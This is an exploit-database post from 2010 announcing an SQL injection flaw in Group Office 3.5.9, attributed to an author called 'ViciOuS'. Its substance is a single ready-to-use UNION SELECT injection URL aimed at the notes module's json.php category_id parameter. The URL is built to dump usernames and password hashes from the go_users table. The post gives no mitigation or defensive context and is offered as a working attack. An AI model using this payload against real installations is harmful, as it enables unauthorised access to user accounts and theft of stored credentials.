[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Group Office 3.5.9 SQL Injection Vulnerability
# Published : 2010-09-13
# Author : ViciOuS
# Previous Title : MOAUB #13 - Luftguitar CMS Vulnerability: Upload Arbitrary File
# Next Title : osDate (uploadvideos.php) Shell Upload Vulnerability
=====================================================================================
Group Office (/notes/json.php?task=category&category_id) SQL Injection Vulnerability
=====================================================================================
########################################################################################
Author : ViciOuS
Author Web Page :http://www.sabotaj.in
Email : vicious[at]sabotaj.in
Script Page : http://www.group-office.com
########################################################################################
Sql Injection :
http://localhost/www/groupoffice-com-3.5.9/modules/notes/json.php?task=category&category_id=999999 union(select 1,concat_ws(0x3a,username,password),3,4+from+go_users)--
########################################################################################
Thanks WwW.sabotaj.iN
########################################################################################